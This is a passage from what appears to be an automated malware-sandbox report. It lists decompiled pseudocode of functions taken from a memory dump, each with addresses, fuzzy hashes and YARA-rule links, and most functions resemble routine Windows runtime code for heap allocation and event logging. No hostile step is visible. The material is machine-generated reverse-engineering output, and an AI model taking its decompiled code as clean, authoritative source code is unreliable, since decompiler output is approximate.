				_v16 = __edx;
				_v50 = 0x1021;
				if(E050A7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E050CB640(E050C9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0514131b
0x0514132a
0x05141330
0x05141336
0x0514133e
0x05141341
0x05141344
0x0514134f
0x05141361
0x05141351
0x0514135a
0x0514135a
0x0514136c
0x0514136d
0x0514136f
0x05141374
0x05141387

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b2d6ef29d45c0f5402d220229737562bfd5af1d9e0af8abb6a3bb49067911d6
Instruction ID: 040d3ae1ec4ae20ce481b45b33628bcfae90abbc3367c8b3bf556696b6af86b2
Opcode Fuzzy Hash: 0b2d6ef29d45c0f5402d220229737562bfd5af1d9e0af8abb6a3bb49067911d6
Instruction Fuzzy Hash: 01013171E0124CAFCB14DFA9D545AAEBBF4FF18700F404459B845EB381E6349A40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05158F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E05158F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x517d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E050A7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E050CB640(E050C9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x05158f6a
0x05158f79
0x05158f81
0x05158f84
0x05158f8b
0x05158f91
0x05158f94
0x05158f9e
0x05158fb0
0x05158fa0
0x05158fa9
0x05158fa9
0x05158fbb
0x05158fbc
0x05158fbe
0x05158fc3
0x05158fd6

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9481931792ebd515ad390733b069fe786d5ade19a788c4bbc51daa47bb60dc40
Instruction ID: 50d3365b647cbe51e0e952f58f173bce247e4ca36a878da7bd5a0111db3f11af
Opcode Fuzzy Hash: 9481931792ebd515ad390733b069fe786d5ade19a788c4bbc51daa47bb60dc40
Instruction Fuzzy Hash: 8F013174A0020CEFDB04DFA8E545AAEBBB4EF18300F50445AB955EB381DA34DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 050AC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050AC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E050AC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x50611cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E051588F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x050ac577
0x050ac57d
0x050ac581
0x050ac5b5
0x050ac5b9
0x050ac5ce
0x050ac5ce
0x050ac5ca
0x00000000
0x050ac5ca
0x050ac5c4
0x050ac5c8
0x00000000
0x00000000
0x00000000
0x050ac5ad
0x00000000
0x050ac5af

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0bfa84aa0424a75d2c8e1bbc2a3c346bf9d474e539843ee987f88675dc85db
Instruction ID: 92f48e1a039df9b7280faae5c349dcce175beaecc6cb7c20f23be42ad0cce078
Opcode Fuzzy Hash: dc0bfa84aa0424a75d2c8e1bbc2a3c346bf9d474e539843ee987f88675dc85db
Instruction Fuzzy Hash: DCF090B39197909FFB71C7B4E04CF297BE5BB05670F568466F41687101D6A4DCC0C250

Uniqueness

Uniqueness Score: -1.00%

Function 05158D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E05158D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x517d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E050A7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E050CB640(E050C9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x05158d34
0x05158d43
0x05158d4b
0x05158d4e
0x05158d52
0x05158d5c
0x05158d6e
0x05158d5e
0x05158d67
0x05158d67
0x05158d79
0x05158d7a
0x05158d7c
0x05158d81
0x05158d94

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37f32f4a0950032fe7658dc09196d25d600b08431b7b0d95d821444b0a16408
Instruction ID: 4b61c7e74c10af3f606ea7d4fb9d61122c27b0b46cabef6b3a7c2ef02862314d
Opcode Fuzzy Hash: f37f32f4a0950032fe7658dc09196d25d600b08431b7b0d95d821444b0a16408
Instruction Fuzzy Hash: 44F0B470A0464CEFD714EFB9E446BAE77B4EF14300F508099E915EB380DA34D900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05142073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E05142073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0513FD22(__ecx);
				_t19 =  *0x517849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x5178748; // 0x0
					if(__eflags <= 0) {
						E05141C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x5178724 & 0x00000004;
							if(( *0x5178724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x5178724; // 0x0
					return E05138DF1(__ebx, 0xc0000374, 0x5175890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x05142076
0x05142078
0x0514207d
0x05142083
0x051420a4
0x051420aa
0x051420ac
0x051420b7
0x051420ba
0x051420bc
0x051420c9
0x051420c9
0x051420d0
0x051420d2
0x00000000
0x051420d2
0x051420be
0x051420c3
0x051420c5
0x051420c7
0x00000000
0x00000000
0x051420c7
0x051420bc
0x051420d4
0x05142085
0x05142085
0x051420a3
0x051420a3

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 522301b9032d370a21ab9d1d4da2109f7575b1aaa21312b6ed00fae8309bb34f
Instruction ID: 651870cb993806600d10d1548d317b3a1cb170d74309d2dc710b659d36b76df1
Opcode Fuzzy Hash: 522301b9032d370a21ab9d1d4da2109f7575b1aaa21312b6ed00fae8309bb34f
Instruction Fuzzy Hash: FDF0A77E5351885BEF366B2D651B7F56FF1E745110F092485F46227241CB3888C3CE14

Uniqueness

Uniqueness Score: -1.00%

Function 050C927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E050C927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L050A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E050CFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E050C92C6(_t11, _t14);
				}
				return _t11;
			}

0x050c9295
0x050c9299
0x050c929f
0x050c92aa
0x050c92ad
0x050c92ae
0x050c92af
0x050c92b0
0x050c92b4
0x050c92bb
0x050c92bb
0x050c92c5

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: ac1b8e18805e52d26cb4691558574dfade93d5feb4f303a9728f1fbbd70490b2
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 4AE065723405406BE7119F56EC84F9F7A99AF92721F0444BDB5055E242C6E5D90987A0

Uniqueness

Uniqueness Score: -1.00%

Function 050A746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E050A746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0509EB70(__ecx, 0x51779a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E050C95D0();
							L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x050a746d
0x050a746d
0x050a746d
0x050a7471
0x050a7488
0x050ef92d
0x050a748e
0x050a7491
0x050a7495
0x050ef937
0x050ef93a
0x050ef94e
0x050ef953
0x050ef956
0x050ef956
0x050a7495
0x00000000
0x050a7488
0x050a7473
0x050a7478
0x050a747d
0x050a7481
0x00000000
0x050a7481
0x050a747d
0x050a747a
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c8748bc43ceccde2887f9bf9e39aa04bcd1d5dfd9deb98a365344e60c8505a
Instruction ID: 4c2a738f100ffcb598cf4fb55bf700367f8cd1cad5ea14bb9ce6a32620a947f1
Opcode Fuzzy Hash: b5c8748bc43ceccde2887f9bf9e39aa04bcd1d5dfd9deb98a365344e60c8505a
Instruction Fuzzy Hash: 0AF0BE36A05245EADF49DBF8E940FBEBBB6FF04210F148255DC92AB160E7259800C785

Uniqueness

Uniqueness Score: -1.00%

Function 05158CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05158CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x517d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E050A7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E050CB640(E050C9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05158ce5
0x05158ced
0x05158cf0
0x05158cfb
0x05158d0d
0x05158cfd
0x05158d06
0x05158d06
0x05158d18
0x05158d19
0x05158d1b
0x05158d20
0x05158d33

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73856fae5a7482b3ff69c427c8e9ccaa6164302e819dff414cbac9fc64720d2b
Instruction ID: fdc030704f6ff2817d64c80aadf0dda485fbd45daede975c7005d4858e207ed2
Opcode Fuzzy Hash: 73856fae5a7482b3ff69c427c8e9ccaa6164302e819dff414cbac9fc64720d2b
Instruction Fuzzy Hash: 89F08974A0454CEBDB04DBA9E546DAE77B4EF15310F500199F915EB3C0EA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 05084F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05084F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E051588F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E050AC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x5061030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x05084f2e
0x05084f34
0x05084f38
0x050e0b85
0x050e0b85
0x050e0b89
0x050e0b9a
0x050e0b9a
0x050e0b9f
0x00000000
0x050e0b9f
0x050e0b94
0x050e0b98
0x00000000
0x00000000
0x00000000
0x050e0b98
0x05084f3e
0x05084f48
0x00000000
0x05084f6e
0x00000000
0x05084f70

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 662b4b2a83470150f9efdaa114258373986081765a03bcd3907efd79a40bbbe2
Instruction ID: 40b052b9c41c2874a001d34cb711514c3fdcc0e22530ef3f87811ddf06333664
Opcode Fuzzy Hash: 662b4b2a83470150f9efdaa114258373986081765a03bcd3907efd79a40bbbe2
Instruction Fuzzy Hash: 19F0E2325256849FDBB1D728E1ACF3BB7E9FB00778F658464E41687921C7B4EC84C650

Uniqueness

Uniqueness Score: -1.00%

Function 05158B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05158B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x517d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E050A7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E050CB640(E050C9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05158b67
0x05158b6f
0x05158b72
0x05158b7d
0x05158b8f
0x05158b7f
0x05158b88
0x05158b88
0x05158b9a
0x05158b9b
0x05158b9d
0x05158ba2
0x05158bb5

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40c15b85e911c1a9952ff721b0fd96a4f193c6dd1ae6c9b742cb5bee5cea1cf
Instruction ID: 595ccaa81f9b501c5bd948191aa0699fbee1296e27a831e7fd129a0780610a1a
Opcode Fuzzy Hash: a40c15b85e911c1a9952ff721b0fd96a4f193c6dd1ae6c9b742cb5bee5cea1cf
Instruction Fuzzy Hash: 7AF05EB0A14258ABDB14EBA8E94AEAE77B8EF04300F540499B915AB381EB34D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 050BA44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050BA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x5177b9c; // 0x0
				_t15 = __ecx;
				_t16 = L050A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E050CFA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x050ba44b
0x050ba453
0x050ba472
0x050ba476
0x00000000
0x050ba493
0x050ba47a
0x050ba47f
0x050ba486
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9518d477857babc8dcf4cef3d270033dc64a249d28036e44715bae09ca930a
Instruction ID: 61a8c31f4b613f1f5a39fcc4a54b2f013db026d10134131c004630d8a256ee1b
Opcode Fuzzy Hash: cd9518d477857babc8dcf4cef3d270033dc64a249d28036e44715bae09ca930a
Instruction Fuzzy Hash: ADE092B2B01421ABE2119B58BC40FAFB7AEEBE5651F094039F905C7250DAA8DD01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0508F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0508F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E050BF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L050A4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0508f35d
0x0508f361
0x0508f367
0x0508f372
0x0508f38c
0x0508f38c
0x0508f394

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 53c5494ee734a00ffe31b4ca6f518933a7c81e3c4e59bc623598615532e0d3cc
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: B7E0D832A40118BBDB31A6D9AD05FEEBBACDB54AA0F000165B904D7150D5A19D00C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 0509FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0509FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x50611a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E051588F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E050A0050(_t14);
				}
			}

0x0509ff66
0x0509ff6b
0x00000000
0x0509ff8f
0x00000000
0x0509ff8f

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d433c03315843802a09acc35dee38c4b39b3fa40ffc6ac8c3d9d8e97d19341e5
Instruction ID: a4198f35f370c2cc7a916c102dc73fc42cd3d50326bb360b0a5f6ebce30849ed
Opcode Fuzzy Hash: d433c03315843802a09acc35dee38c4b39b3fa40ffc6ac8c3d9d8e97d19341e5
Instruction Fuzzy Hash: 34E0DFB1209285DFDF3ADB51F0A5F2D37E9AF42621F29801DE4088B201C661E8C0E606

Uniqueness

Uniqueness Score: -1.00%

Function 051141E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E051141E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x51608f0);
				_t5 = E050DD08C(__ebx, __edi, __esi);
				if( *0x51787ec == 0) {
					E0509EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x51787ec == 0) {
						 *0x51787f0 = 0x51787ec;
						 *0x51787ec = 0x51787ec;
						 *0x51787e8 = 0x51787e4;
						 *0x51787e4 = 0x51787e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L05114248();
				}
				return E050DD0D1(_t5);
			}

0x051141e8
0x051141ea
0x051141ef
0x051141fb
0x05114206
0x0511420b
0x05114216
0x0511421d
0x05114222
0x0511422c
0x05114231
0x05114231
0x05114236
0x0511423d
0x0511423d
0x05114247

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 493cca9162ca7c628d4503ad701c2179b752ce9e09c033ed52e2bf404876f52a
Instruction ID: a96698dae1b07e3e5e9bcfe74fdf0ca41395955def1585c3b73a71bb3cbd3235
Opcode Fuzzy Hash: 493cca9162ca7c628d4503ad701c2179b752ce9e09c033ed52e2bf404876f52a
Instruction Fuzzy Hash: F6F0F875920708EEEB60FFACA50E7583BB4F748721F4041AAA106A62C4CB7444C1DF15

Uniqueness

Uniqueness Score: -1.00%

Function 0513D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0513D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0508E8B0(__ecx, _a4, 0xfff);
					L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0513d38a
0x0513d39b
0x0513d3b1
0x00000000
0x0513d3b6
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 533d373c5c4f83ef13453d8bf2cde8b5df76a7464c474e860ce11d9ef985f4e5
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 41E0C232380204FBDB226E44EC01FBD7B1AEB507E0F104031FE086A690C6719C91D6C4

Uniqueness

Uniqueness Score: -1.00%

Function 050BA185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050BA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x51767e4 >= 0xa) {
					if(_t5 < 0x5176800 || _t5 >= 0x5176900) {
						return L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E050A0010(0x51767e0, _t5);
				}
			}

0x050ba190
0x050ba1a6
0x050ba1c2
0x00000000
0x00000000
0x00000000
0x050ba192
0x050ba192
0x050ba19f
0x050ba19f

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1799bd69001a03ac947f7910cca86ab330653608b444f80a8d912eb355d7d055
Instruction ID: b556b5e9934c1951f7427899b0f4dd88ff77ff1327fc086c00086b76e2e8b887
Opcode Fuzzy Hash: 1799bd69001a03ac947f7910cca86ab330653608b444f80a8d912eb355d7d055
Instruction Fuzzy Hash: 31D0C2323614083AE61DA358AEE8B7D2236E784700FA4484CE1020A590DA9488D48108

Uniqueness

Uniqueness Score: -1.00%

Function 050B16E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050B16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E050B1710(0x51767e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L050A4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x050b16e8
0x050b16ef
0x050b16f3
0x050b16fe
0x00000000
0x050b1700
0x050b170d
0x050b170d
0x050b16f2
0x050b16f2
0x050b16f2
0x050b16f2

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892755be3484a26a3898fd9fa395875133229cc3771a6e2c5518de2deb42d5ce
Instruction ID: 8f24b38ed50b8b86919ca7feb0087612734b53ee30959783164318a151991a34
Opcode Fuzzy Hash: 892755be3484a26a3898fd9fa395875133229cc3771a6e2c5518de2deb42d5ce
Instruction Fuzzy Hash: D6D0A731240100A2EE2D5B14FDA8BDC23A1EBD0781F38005CF107594C0CFE4CDA3E048

Uniqueness

Uniqueness Score: -1.00%

Function 051053CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E051053CA(void* __ebx) {
